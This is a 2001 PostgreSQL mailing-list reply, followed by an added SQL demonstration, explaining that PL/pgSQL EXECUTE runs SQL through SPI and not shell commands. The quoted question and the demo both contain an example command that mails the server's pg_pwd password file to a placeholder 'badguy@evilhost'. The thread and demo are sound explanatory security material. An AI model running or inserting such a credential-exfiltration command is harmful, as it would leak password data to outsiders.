Re: Security hole in PL/pgSQL
From | Jan Wieck |
---|---|
Subject | Re: Security hole in PL/pgSQL |
Date | |
Msg-id | 200101291816.NAA03906@jupiter.greatbridge.com |
In reply to | Re: Security hole in PL/pgSQL (KuroiNeko <evpopkov@carrier.kiev.ua>) |
List | pgsql-hackers |
KuroiNeko wrote:
> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
>
> Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to execute arbitrary code as postgres (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
>
> be avoided?

No, EXECUTE just passes a string down to SPI_exec() without trying to
prepare and save an execution plan for it. It's not equivalent to system(3).

Jan

--
#======================================================================#
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me.                                  #
#================================================== JanWieck@Yahoo.com #

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
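The point Jan makes, shown in working SQL as an added example that is not part of the thread: PL/pgSQL EXECUTE hands its string to the SQL executor through SPI, so a shell command line is rejected by the SQL parser, and the dynamic statement runs with the calling role's privileges, so the ordinary COPY restriction still applies. This is written for a current PostgreSQL release (dollar quoting, EXECUTE ... INTO and SECURITY INVOKER/DEFINER keywords did not exist in the 2001 codebase the thread discusses); the table, function and role names are made up for the demonstration.

```sql
-- Added example, not code from the original thread. Assumes a current
-- PostgreSQL release and a superuser session to set things up.
-- demo_t, count_rows, run_shell_like, dump_to_file and demo_user are
-- constructed names for this demonstration only.

CREATE TABLE demo_t (id int, note text);
INSERT INTO demo_t VALUES (1, 'alpha'), (2, 'beta');

-- 1. EXECUTE takes an SQL string and runs it through SPI as SQL.
--    quote_ident() keeps a hostile table name from being parsed as
--    additional SQL, which is the real injection risk of dynamic EXECUTE.
CREATE FUNCTION count_rows(tbl text) RETURNS bigint
LANGUAGE plpgsql SECURITY INVOKER AS $$
DECLARE
  n bigint;
BEGIN
  EXECUTE 'SELECT count(*) FROM ' || quote_ident(tbl) INTO n;
  RETURN n;
END
$$;

SELECT count_rows('demo_t');        -- returns 2

-- 2. A shell command line is not SQL. The string never reaches exec*();
--    the SQL parser rejects it before anything is executed.
CREATE FUNCTION run_shell_like() RETURNS void
LANGUAGE plpgsql AS $$
BEGIN
  EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
END
$$;

SELECT run_shell_like();            -- ERROR: syntax error at or near "/"

-- 3. With the default SECURITY INVOKER, the dynamic statement runs as the
--    caller, so the usual guard on COPY to a server file still applies.
CREATE FUNCTION dump_to_file(path text) RETURNS void
LANGUAGE plpgsql SECURITY INVOKER AS $$
BEGIN
  -- quote_literal() turns the path into a properly escaped SQL literal
  EXECUTE 'COPY demo_t TO ' || quote_literal(path);
END
$$;

CREATE ROLE demo_user LOGIN;        -- constructed unprivileged role
GRANT SELECT ON demo_t TO demo_user;

SET ROLE demo_user;
SELECT dump_to_file('/tmp/demo.out');
-- fails: COPY to a server file requires superuser (or, in current
-- releases, membership in pg_write_server_files); demo_user has neither.
RESET ROLE;

-- As superuser the same call succeeds, which is exactly the existing
-- COPY defense the thread refers to: the check is on the role, not on
-- whether the statement was typed directly or built inside PL/pgSQL.
```

The caveat a practitioner should keep in mind is the third case: the protection holds because the function is SECURITY INVOKER. A SECURITY DEFINER function owned by a superuser that builds an EXECUTE string from untrusted input would let the caller run whatever SQL (including COPY to a file) the owner may run, so such functions need quote_ident()/quote_literal() (or format() with %I and %L) on every interpolated value and should be owned by a least-privileged role.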